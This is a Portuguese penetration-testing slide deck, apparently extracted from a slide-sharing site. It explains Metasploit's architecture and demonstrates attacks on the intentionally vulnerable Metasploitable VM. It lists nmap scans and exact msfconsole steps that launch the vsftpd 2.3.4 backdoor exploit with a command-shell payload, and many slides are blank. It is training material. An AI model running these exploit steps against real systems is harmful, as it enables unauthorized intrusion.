invasaocom exploits

45
Testes de Segurança Nauber Gois

Upload: nauber-gois

Post on 19-Mar-2017

92 views

Category:

Technology


0 download

TRANSCRIPT

Page 1: Invasaocom exploits

Testes de SegurançaNauber Gois

Page 2: Invasaocom exploits
Page 3: Invasaocom exploits

Metasploitable - Linux com vulnerabilidades

Page 4: Invasaocom exploits

nmap -Pn [target IP address]

Page 5: Invasaocom exploits
Page 6: Invasaocom exploits

O REX(Ruby Extension Library) é o núcleo do Metasploit, ele disponibiliza a API com funcionalidades que ajudam no desenvolvimento de um exploit, além de bibliotecas,

sockets e protocolos.

O CORE do framework é constituído de sub-sistemas que controlam sessões, módulos, eventos é a API base.

O BASE fornece uma API amigável e simplifica a comunicação com outros módulos, interfaces e plugins.

Page 7: Invasaocom exploits

Na camada MODULES é onde reside os exploits e payloads, basicamente os exploits são programas escritos para explorar alguma falha e o payload é como um

complemento para o exploit. Basicamente o payload é o código que vai ser injetado no alvo, ao ser injetado alguma ação pré-definida será executada, por exemplo: (realizar um download, executar um arquivo, apagar alguma informação ou estabelecer uma

conexão com outro sistema).

A camada de INTERFACES conta com o modo console onde temos um shell poderoso que trabalha em conjunto com o SO, o cli que fornece uma interface onde é possível

automatizar testes de invasão e ainda temos interfaces web e gui.

Page 8: Invasaocom exploits

Comandos do metasploit

Page 9: Invasaocom exploits
Page 10: Invasaocom exploits

Um exploit (em português explorar, significando "usar algo para sua própria vantagem") é um pedaço de software, um pedaço de dados ou uma sequência de comandos a fim de causar um comportamento acidental ou imprevisto a ocorrer no software ou hardware de um computador ou em algum eletrônico (normalmente computadorizado).

Page 11: Invasaocom exploits

No caso de um exploit, o payload é a parte do código injetada na vítima que vai executar alguma ação: criar um usuário, iniciar um processo, apagar arquivos, etc. Ou seja lá o que for que o atacante quer que seja executado quando a vulnerabilidade for explorada com sucesso pelo seu exploit.

Page 12: Invasaocom exploits
Page 13: Invasaocom exploits
Page 14: Invasaocom exploits
Page 15: Invasaocom exploits
Page 16: Invasaocom exploits
Page 17: Invasaocom exploits
Page 18: Invasaocom exploits
Page 19: Invasaocom exploits
Page 20: Invasaocom exploits

nmap -sV [IP] -p 21search vsftpd

Page 21: Invasaocom exploits

msfconsole

When msfconsole is running select the backdoor exploit using the following command:

use exploit/unix/ftp/vsftpd_234_backdoor

Type the following command to have a look at the exploit options:

Show options

Page 22: Invasaocom exploits

set rhost 192.168.25.168

show payloads

set payload cmd/unix/interact

run

Page 23: Invasaocom exploits
Page 24: Invasaocom exploits

Procurando por vulnerabilidades

Page 25: Invasaocom exploits

nmap -sV [IP] -p 6667search unreal ircd

Page 26: Invasaocom exploits
Page 27: Invasaocom exploits
Page 28: Invasaocom exploits
Page 29: Invasaocom exploits

nmap -sV [IP] -p 80search apache

Page 30: Invasaocom exploits
Page 31: Invasaocom exploits
Page 32: Invasaocom exploits
Page 33: Invasaocom exploits

nmap -sV [IP] -p 139search samba

Page 34: Invasaocom exploits
Page 35: Invasaocom exploits
Page 36: Invasaocom exploits
Page 37: Invasaocom exploits
Page 38: Invasaocom exploits
Page 39: Invasaocom exploits
Page 40: Invasaocom exploits
Page 41: Invasaocom exploits
Page 42: Invasaocom exploits

nmap -sV [IP] -p8787

searchsploit -e Ruby DRb RMI

searchsploit -e Ruby

cat /usr/share/exploitdb/platforms/linux/remote/17058.rb

Page 43: Invasaocom exploits

search name:Distributed Ruby Send instance_eval/syscall Code Execution

Page 44: Invasaocom exploits

Armitage

Page 45: Invasaocom exploits